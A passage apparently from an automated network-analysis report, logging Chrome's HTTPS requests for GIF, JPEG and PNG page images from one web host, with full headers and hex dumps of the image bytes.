                                                      Data Ascii: tW_~IW[6E[?9QuYy*6Ihd]7tc6h-<siSpYBOsE7[@AA94+@SPLMA"6<f<3JaKrE}<l))'RTNE<)z`<`<JBA]^jN


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      83192.168.2.44983620.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:54 UTC406OUTGET /images_plus/index/en/204x30-live-streaming-02.gif?ver=1683086141 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:54 UTC353INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:54 GMT
                                                      Content-Type: image/gif
                                                      Content-Length: 427
                                                      Connection: close
                                                      Last-Modified: Wed, 03 May 2023 03:55:41 GMT
                                                      ETag: "6451db3d-1ab"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:54 UTC427INData Raw: 47 49 46 38 39 61 cc 00 17 00 c4 00 00 4d a0 80 c4 e0 d5 89 c0 aa f1 f8 f5 21 88 60 3f 98 75 b6 d8 ca 6b b0 95 30 90 6a a7 d0 c0 5c a8 8a d3 e8 e0 7a b8 a0 e2 f0 ea 98 c8 b5 ff ff ff 12 80 55 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 f9 04 05 00 00 10 00 2c 00 00 00 00 cc 00 17 00 00 05 ff 20 24 8e 64 69 9e 68 aa ae 6c eb be 70 2c cf 74 6d df 78 ae ef 7c ef ff c0 a0 70 48 2c 1a 8f c8 56 01 80 38 2d 9b 00 a6 69 59 80 2c a3 58 40 72 cb e5 3e 1e 81 d3 57 00 19 3c 16 26 33 fa cb 66 6b bb f0 38 f0 1b 36 8d 21 89 6f 73 a4 f8 32 20 6d 6d 55 72 84 85 37 74 62 0f 64 7d 0f 7f 23 79 0f 4d 88 86 94 95 34 93 25 77 65
                                                      Data Ascii: GIF89aM!`?uk0j\zU!NETSCAPE2.0!, $dihlp,tmx|pH,V8-iY,X@r>W<&3fk86!os2 mmUr7tbd}#yM4%we


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      84192.168.2.44983720.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:54 UTC388OUTGET /common/storage/cms/cms_1052.jpg?ver=1611754797 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:54 UTC357INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:54 GMT
                                                      Content-Type: image/jpeg
                                                      Content-Length: 29389
                                                      Connection: close
                                                      Last-Modified: Wed, 27 Jan 2021 13:39:57 GMT
                                                      ETag: "60116d2d-72cd"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:54 UTC3739INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 05 04 04 04 04 04 05 04 04 05 07 05 04 05 07 09 07 05 05 07 09 0a 08 08 09 08 08 0a 0d 0a 0b 0b 0b 0b 0a 0d 0c 0c 0c 0d 0c 0c 0c 0f 0f 11 11 0f 0f 17 16 16 16 17 19 19 19 19 19 19 19 19 19 19 ff db 00 43 01 06 06 06 0a 09 0a 14 0d 0d 14 16 11 0e 11 16 19 19 19 19 19 19 19 19 19 19 19 19 19 19 19 19 19 19 19 19 19 19 19 19 19 19 19 19 19 19 19 19 19 19 19 19 19 19 19 19 19 19 19 19 19 19 19 19 19 ff c2 00 11 08 00 d6 03 4c 03 01 11 00 02 11 01 03 11 01 ff c4 00 1b 00 00 03 00 03 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 00 04 05 06 07 ff c4 00 1a 01 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 01 00 02 03 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 01 f0 38 da 54 dc a3 2c
                                                      Data Ascii: JFIFCCL8T,
                                                      2025-01-12 23:47:54 UTC4096INData Raw: 9d 79 df 57 9f 59 cf 47 9f 4e 87 2e 9c 6e bc b6 79 f4 de f1 fd 5f 96 78 ff 00 43 7b a7 d7 3d bf 96 d9 d7 1d 8c bf 28 c7 4e 3d 6e 1a 4e 7d 64 69 e3 2b 56 a0 92 df 2f 7f 6f de 6b 9f 52 3e 4e 9e 4b 58 3a 29 9d 57 3a 71 a5 35 4e 12 b2 58 72 a5 5a ee 75 f5 94 85 60 86 8d 12 34 18 10 a3 2f 96 b6 98 69 4f 59 4f 33 89 b9 54 56 78 a6 75 b1 9d d0 56 a3 ac cf 59 8e f0 23 33 a6 ce ec 69 85 62 70 1b 28 40 ac 87 9e 5e f0 c6 9a 1a 2a 3b 16 aa 36 34 2a 2e 72 be 97 d7 8f a2 d1 f0 5f 9f fa 6e 9e fc 9e d3 ea fe 67 5b a6 36 35 5f 9e fb bc 7b ea 74 e7 14 9f 0f 67 23 cb f5 07 5f 2f 4b 96 fd 27 a3 e6 f5 0d f1 73 ea f9 87 83 f5 51 73 f4 2f 5f e7 3d 0f 5f 01 cb f1 1c 6e 34 64 46 c6 7a 1c 6f 33 bc 8d 67 32 d6 7e 90 eb dd 6b 9d e3 9b 5f 12 d6 52 9e ab 9d 30 a2 61 22 65 56 6c 68 8c
                                                      Data Ascii: yWYGN.ny_xC{=(N=nN}di+V/okR>NKX:)W:q5NXrZu`4/iOYO3TVxuVY#3ibp(@^*;64*.r_ng[65_{tg#_/K'sQs/_=_n4dFzo3g2~k_R0a"eVlh
                                                      2025-01-12 23:47:54 UTC4096INData Raw: 8b d5 e6 b0 06 2b 35 4a da 7f 97 e1 4a a6 c7 38 c0 e2 9b b3 eb 1f 05 87 d9 ce 6b c1 7c 40 2b 6a bf e9 17 c0 fe 66 fb dc 23 50 32 be f9 e6 1c 86 20 06 bc 78 bd 54 aa d7 34 37 fe 47 f2 b6 67 e2 f9 bd 7c 3b 6b 08 3f ba c4 61 5f 44 f1 e2 3c f2 e1 36 86 e0 87 f1 1e 0b 16 e0 ef ab cf 56 34 c2 08 67 9e ba 32 0c 85 04 2c 6e 55 13 0f 1e e8 95 b4 ff 00 2f c5 b6 4b 7e b2 7c 87 f7 7d ad dd 6d f6 73 26 b0 f4 52 14 a2 63 8a 79 de 24 fa ad d5 0b 66 0f b3 f3 90 f1 55 b6 68 71 96 70 55 69 ba 99 87 08 cb bb 9c dc 74 93 a1 1a c3 58 65 08 58 e4 c1 33 7e a8 08 2c 63 f7 ab 38 db 64 7f b5 f6 ab fe b0 3c 22 fb 28 7d c3 ec a2 2d 8e ab b9 44 f9 9c 98 76 6e 53 03 d1 4a 73 97 6a 26 3c 53 5c d5 bc cf 34 e1 4d e3 ea e2 15 6d 9b ff 00 1c bd 53 d8 58 60 d9 b4 d7 24 6c 32 1d 23 a1 36 95
                                                      Data Ascii: +5JJ8k|@+jf#P2 xT47Gg|;k?a_D<6V4g2,nU/K~|}ms&Rcy$fUhqpUitXeX3~,c8d<"(}-DvnSJsj&<S\4MmSX`$l2#6
                                                      2025-01-12 23:47:54 UTC4096INData Raw: 95 4a 93 18 d9 90 e3 6f 58 39 a0 cd 1b 40 06 43 ef 9d 67 92 c3 0d e7 d1 f9 f1 6f c0 f1 51 44 c7 3d a6 38 01 ab da 4e 7d c8 fa 56 61 a9 de 7c 93 67 79 fd a3 4a 26 90 81 66 35 dc 4a 11 7f 68 c2 66 c3 cd 9d 9b 2f 58 d9 a3 4d 3b b7 36 47 6c a7 e8 fa 5c 0c 92 22 0b d8 3d dc 3b 95 44 2c 6b ba da b6 5c d2 14 c0 6e a1 f0 2a f7 5c 02 ea d6 3a 9f 25 70 9d 3b b9 b1 34 b8 f6 05 24 ce e7 48 e2 e3 df f8 2f 75 c1 59 5d 5b 90 72 cb a3 bb db 16 ed dd f3 44 1c c6 7d 05 74 47 9b 2b 32 eb 6d fc aa 9c 0e 78 5d 43 dd ca d8 9e f0 cd 27 46 20 62 3c 32 f9 84 34 87 92 fd 53 71 6a f2 61 73 45 6b c7 b9 10 f0 c9 e3 27 16 19 05 68 4f 05 82 01 1e 8e 4e 7a b6 dc 77 a8 ce 22 e7 4b 56 39 db f6 82 c5 23 fb 95 06 4a 21 bc c9 fe d5 65 b2 14 26 47 59 d5 6f 88 2a 99 aa b1 d8 54 ad 71 c4 30 3b
                                                      Data Ascii: JoX9@CgoQD=8N}Va|gyJ&f5Jhf/XM;6Gl\"=;D,k\n*\:%p;4$H/uY][rD}tG+2mx]C'F b<24SqjasEk'hONzw"KV9#J!e&GYo*Tq0;
                                                      2025-01-12 23:47:54 UTC4096INData Raw: c0 c2 cb c1 14 59 08 23 95 14 b8 b1 c5 e1 c5 6a 54 09 52 b3 81 04 11 a6 37 eb 71 6f ab fd 2b e2 0b dd 46 3e a7 09 78 e9 e9 f8 df ae 65 1b 91 79 03 1f 9d 12 87 97 d2 d0 46 8a d1 be 91 eb 92 8e 8d 91 7d ee c6 5e 9e 06 cf a1 cb e6 35 2b ae 58 15 08 1f 69 4b 4b ac e1 5a 2b 6c 5c 76 13 74 d2 dc 5c a0 8a d2 77 ad a3 89 c7 44 ba 91 78 7a 31 d2 47 88 2f e4 39 fa 83 da 42 57 05 11 e4 0e bc c1 7c 8e a9 f9 b2 68 bd 01 5d 0f 07 49 ce f0 5f 63 59 e6 52 87 49 af bd ff 00 7d f9 9a 9e a5 ef a1 ff 00 d8 8d 5a ab ab b3 f3 3f 21 20 bb 86 31 0d 8d 32 96 b1 df 7c a6 cd a8 dc a1 39 96 fb 41 52 ea 3d 88 96 32 f5 a9 5f 1b 04 f0 73 7a ed 48 0d 52 50 f2 60 c1 9a 46 58 21 60 e5 11 22 47 f8 6f 21 24 98 2f d0 64 23 12 08 32 42 5c 58 c5 fa 03 17 c0 3d 28 01 9d 4b 6f b4 79 6a 3f 10 b8
                                                      Data Ascii: Y#jTR7qo+F>xeyF}^5+XiKKZ+l\vt\wDxz1G/9BW|h]I_cYRI}Z?! 12|9AR=2_szHRP`FX!`"Go!$/d#2B\X=(Koyj?
                                                      2025-01-12 23:47:54 UTC4096INData Raw: f3 32 49 08 86 18 6d e3 6c f3 79 9c 0b 27 60 e3 dc 19 33 ee 63 8c 35 fe 9f cc f8 fd 97 f6 67 f5 3f f6 05 0f b7 f6 b2 dc f3 69 be 4f de 66 10 14 1e 3e 3e cd b9 7c 7d 92 b5 08 f5 e4 f2 fe 93 1a f3 fe 7c 31 bc 93 fb ec 03 61 a1 e6 03 e0 59 1b 1f 5b cb 13 0c fb 38 75 f1 78 43 0c 2d f1 21 ee 17 f1 0e fa 92 10 79 e5 41 c6 59 04 16 71 e6 c4 71 26 4b 2c 99 e2 77 6f 11 13 07 8d 86 db 67 e9 10 e4 f4 c8 88 61 b6 5e 6f 77 ac cb 2c 88 20 e1 e1 87 4b d1 fa 9f cd ac 87 9b f6 0f 93 f5 fb 5f 95 7a fd e0 0f 20 cf 59 fe 6f 61 bf ab fd 5a 18 c3 d2 f5 c4 0d 7e ef f1 7c 1f 31 ea 12 10 fb 7f 31 cf ed 1f c9 69 f5 e5 63 c8 f5 84 4f 5e 2f e3 3f d7 37 2f 9f f8 b6 2d e1 b2 3c 42 f9 87 f2 41 e1 ee 08 e0 e0 38 93 2c 47 06 d9 9b 21 d2 5e e4 1c db 79 b6 c3 6c 4f 08 88 8b 67 87 a4 5b 2f
                                                      Data Ascii: 2Imly'`3c5g?iOf>>|}|1aY[8uxC-!yAYqq&K,woga^ow, K_z YoaZ~|11icO^/?7/-<BA8,G!^ylOg[/
                                                      2025-01-12 23:47:54 UTC4096INData Raw: c8 84 a8 64 5b 73 72 a2 b9 cc d4 ac 4c 89 3d 66 23 09 67 a4 d7 84 20 46 18 c4 e6 14 e7 c3 b0 c1 60 10 43 ea 73 15 e1 ec 82 a2 c5 c4 d2 30 06 01 9b 8d 8a ee 7c 12 b7 33 b2 17 65 a3 05 b3 b1 9f 06 4a f8 00 59 5b 0e 61 d5 41 2c 4e a5 f4 d3 8d f6 2b fb 50 c0 6e 8b 0c 0f 74 b5 b8 be d4 ed 11 ea e7 fa 8d dc 4b ff 00 95 a9 17 ee 30 c5 8b 48 4b fc 62 d4 15 d0 6a bf 01 05 fa 7b 6f ea 29 91 19 63 f2 ed 4b 51 bd ed cf 0f 03 1b 22 0d ea 00 d9 c6 59 97 ca 77 01 5b 01 16 19 1a 35 1a b3 24 62 c9 71 fa 8d 4d bf 1d 92 f6 61 1a f8 1e 00 2b b8 f6 28 44 fe 3c 09 13 91 64 6a 59 11 39 4b 6a 14 f6 4b 83 15 8a 10 26 ca 54 b6 59 04 0a 8f 68 e4 a1 90 11 30 60 db 2e e5 77 e0 c4 5a 60 7f 10 17 70 84 54 ea f1 12 f7 c3 08 83 98 37 35 e0 b4 39 e2 37 c2 e6 66 64 33 90 cd b3 06 26 d4 44
                                                      Data Ascii: d[srL=f#g F`Cs0|3eJY[aA,N+PntK0HKbj{o)cKQ"Yw[5$bqMa+(D<djY9KjK&TYh0`.wZ`pT7597fd3&D
                                                      2025-01-12 23:47:54 UTC1074INData Raw: 80 7a ec fb 97 46 9e e2 00 15 f3 2f 54 47 d4 41 60 17 86 54 79 34 4a f2 ef 36 08 a5 2b 2f 8f dc 16 25 58 fd 82 c0 34 8e 30 31 da 9a e9 b0 16 80 af a5 87 a5 4a 7c 1f 8a e3 28 ee 50 73 2d ee 27 c0 2f 82 c5 9c 92 a9 c2 e2 88 c2 06 11 ca 2e c5 0c 75 e4 aa 26 bc cf 96 7c 38 9a cc 93 79 a5 be 16 dc 6c 6b 9e e8 69 06 4b 5f 09 a6 77 19 a4 c2 52 a1 45 b2 ea 31 6d f8 05 be 21 ae c7 72 17 e6 0a aa 5d d4 aa 25 e4 50 81 11 e4 55 73 0a c0 4d 42 d9 62 74 52 31 46 94 9b d6 39 f2 e3 b5 ea e0 3e 22 46 b8 df f8 fc 27 ab ea 6d 48 de 05 5d fe 63 40 67 a4 c1 0d 1c a9 c2 ca 0e df d6 99 47 d3 23 4e 61 47 69 b6 2d 07 95 f6 a9 ee 39 68 6c 49 75 01 07 1f 93 9a 8d 33 07 1d cb c8 23 50 98 60 c0 bb b1 74 ae 18 c7 2a ad 6b b6 2b ae 5d f0 1c c4 47 84 7d b0 d3 41 f4 fe 22 bc a9 a2 8d 1b
                                                      Data Ascii: zF/TGA`Ty4J6+/%X401J|(Ps-'/.u&|8ylkiK_wRE1m!r]%PUsMBbtR1F9>"F'mH]c@gG#NaGi-9hlIu3#P`t*k+]G}A"


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      85192.168.2.44983520.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:54 UTC374OUTGET /images_plus/index/panel_b_bg.jpg HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:54 UTC356INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:54 GMT
                                                      Content-Type: image/jpeg
                                                      Content-Length: 4267
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:10 GMT
                                                      ETag: "5fc5abde-10ab"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:54 UTC3740INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 6f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 33 2d 63 30 31 31 20 36 36 2e 31 34 35 36 36 31 2c 20 32 30 31 32 2f 30 32 2f 30 36 2d 31 34 3a 35 36 3a 32 37 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                      Data Ascii: ExifII*DuckyPohttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xm
                                                      2025-01-12 23:47:54 UTC527INData Raw: 2e 8a dc 73 df 2b d6 ff 00 81 9e 55 8b 8c ef 95 22 ff 00 81 9e 5a dc 70 4e 4a 6f f8 17 96 7f e8 1c bc cb a5 7b e8 34 10 68 20 d0 41 a0 8d 45 ba 84 3d 18 90 69 48 71 6f 90 8d 69 12 1c 5b aa 91 a8 b7 44 8a 45 ba 24 52 2d d4 48 a4 5b a3 3b 8a d6 dd 19 dc 56 b6 ea b3 b8 bd 6d d4 63 71 d1 5b 74 63 71 d1 5b 74 63 71 d3 4b 74 63 71 d3 5b f4 73 dc 75 52 fd 1c b7 1d 74 bf 46 37 1d 34 bf 47 2d c7 55 2f d1 8d f2 e9 ad fa 31 b8 bd 6f d1 cf 7c af 5b f5 19 e5 68 fe cf e3 e4 67 7c b7 1f d9 d1 39 6b 7d 19 e4 7f d3 a2 f2 c6 fa ab cb cd 5a ea bd d4 1a e8 41 ae 84 1a e8 41 ae 84 38 b7 44 6b 5d 31 20 d7 54 82 2d d4 23 5a e8 91 a8 b7 55 23 51 6e a1 1b 8b 74 66 29 16 e8 45 22 dd 19 dc 52 2d d1 9d c5 ab 6e 8c ee 2d 5b f4 63 71 7a df a3 11 d1 5b f4 63 71 d1 4b f4 73 dc 74 d2 fd
                                                      Data Ascii: .s+U"ZpNJo{4h AE=iHqoi[DE$R-H[;Vmcq[tcq[tcqKtcq[suRtF74G-U/1o|[hg|9k}ZAA8Dk]1 T-#ZU#Qntf)E"R-n-[cqz[cqKst


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      86192.168.2.44983820.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:54 UTC379OUTGET /images_plus/index/sec-nav-bg-grad.gif HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:55 UTC353INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:54 GMT
                                                      Content-Type: image/gif
                                                      Content-Length: 376
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:10 GMT
                                                      ETag: "5fc5abde-178"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:55 UTC376INData Raw: 47 49 46 38 39 61 01 00 52 02 d5 00 00 05 69 4d 00 79 5a 04 6d 50 00 7a 5b 05 6b 4e 02 76 57 02 77 57 05 6c 4f 02 79 5a 04 72 54 03 75 56 04 70 52 04 71 53 05 6a 4e 04 6e 51 04 73 55 01 79 5a 02 77 58 03 74 56 02 75 57 01 7b 59 02 78 59 04 6f 52 01 7a 5a 02 79 59 03 73 55 01 7b 5a 05 6a 4d 04 6e 50 01 77 58 05 69 4c 00 79 58 04 73 54 02 78 58 04 6f 51 04 72 53 04 70 53 03 75 57 02 78 57 04 6b 4e 02 77 59 01 79 5b 01 7b 5b 03 74 55 00 7b 5c 01 7a 59 01 7a 5b 05 68 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 f9 04 00 00 00 00 00 2c 00 00 00 00 01 00 52 02 00 06 95 c0 97 70 48 2c 1a 8f c8 a4 72 c9 6c 3a 9f d0 a8 74 4a ad 5a af d8 ac 76 2b f4 00 be df cd
                                                      Data Ascii: GIF89aRiMyZmPz[kNvWwWlOyZrTuVpRqSjNnQsUyZwXtVuW{YxYoRzZyYsU{ZjMnPwXiLyXsTxXoQrSpSuWxWkNwYy[{[tU{\zYz[hL!,RpH,rl:tJZv+


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      87192.168.2.44983920.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:54 UTC379OUTGET /images_plus/index/bg-sports-right.gif HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:55 UTC353INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:55 GMT
                                                      Content-Type: image/gif
                                                      Content-Length: 953
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:10 GMT
                                                      ETag: "5fc5abde-3b9"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:55 UTC953INData Raw: 47 49 46 38 39 61 01 00 cc 00 f7 00 00 05 69 4d 01 7a 5a 01 7b 5b 04 6c 4f 04 6d 50 05 68 4c 02 76 57 02 77 58 03 71 53 04 6b 4e 04 6e 51 03 72 54 03 70 52 02 75 56 03 73 55 02 78 59 05 6a 4e 04 6f 51 05 6a 4d 02 74 56 01 79 59 01 79 5a 04 6b 4f 02 78 58 03 74 55 03 6f 52 04 6e 50 02 75 57 05 69 4c 03 73 54 03 70 53 02 79 59 01 7a 5b 04 6a 4e 42 95 7f 02 74 55 02 77 57 04 6c 50 07 40 2c 04 6f 52 06 9d 73 04 61 47 06 99 70 04 65 4a 06 9b 72 06 9c 72 04 62 48 04 63 48 05 73 54 05 74 55 06 92 6b 05 87 63 05 77 57 06 8f 69 04 68 4c 05 83 60 05 7b 5a 04 64 49 05 8a 65 05 8b 66 04 69 4d 06 98 6f 06 96 6e 06 95 6d 04 66 4b 05 7e 5c 06 9a 71 05 80 5e 05 7f 5d 05 70 52 05 85 62 05 79 59 04 6a 4d 05 81 5f 05 8c 67 05 8e 68 05 7a 59 04 67 4b 06 94 6c 06 91 6a 05 7d
                                                      Data Ascii: GIF89aiMzZ{[lOmPhLvWwXqSkNnQrTpRuVsUxYjNoQjMtVyYyZkOxXtUoRnPuWiLsTpSyYz[jNBtUwWlP@,oRsaGpeJrrbHcHsTtUkcwWihL`{ZdIefiMonmfK~\q^]pRbyYjM_ghzYgKlj}


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      88192.168.2.44984020.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:55 UTC376OUTGET /images_plus/index/en/btn_start.png HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:55 UTC353INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:55 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 944
                                                      Connection: close
                                                      Last-Modified: Wed, 15 Mar 2023 04:24:56 GMT
                                                      ETag: "64114898-3b0"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:55 UTC944INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 50 00 00 00 0f 08 03 00 00 00 44 17 b8 bd 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 01 1a 50 4c 54 45 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 06 00 01 ff ff ff ff ff ff 06 00 01 06 00 01 06 00 01 06 00 01 06 00 01 06 00 01 06 00 01 06 00 01 06 00 01 06 00 01 06 00 01 06 00 01 e8 ce 32 b1 9c 26 06 00 01 7a 6a 1a c5 af 2a 30 26 0a 67 59 16 06 00 01 06 00 01 6b 5c 17 8a 79 1d db c2 2f e8 ce 32 bc a6 28 06 00 01 c4 ad 2a 56 49 12 06 00 01 e6 cc 31 e5 cb 31 06 00 01 bd a7 28 cd b6 2c ce b7 2c 54 47 12 0b 05 02 06 00 01 af 9a 25 65 56 15 2d 24 09 9b 88 21 8b 7a 1e 06 00
                                                      Data Ascii: PNGIHDRPDgAMAasRGBPLTE2&zj*0&gYk\y/2(*VI11(,,TG%eV-$!z


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      89192.168.2.44984220.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:55 UTC618OUTGET /common/storage/cms/cms_1051.png?ver=1611754184 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:55 UTC356INHTTP/1.1 200 OK
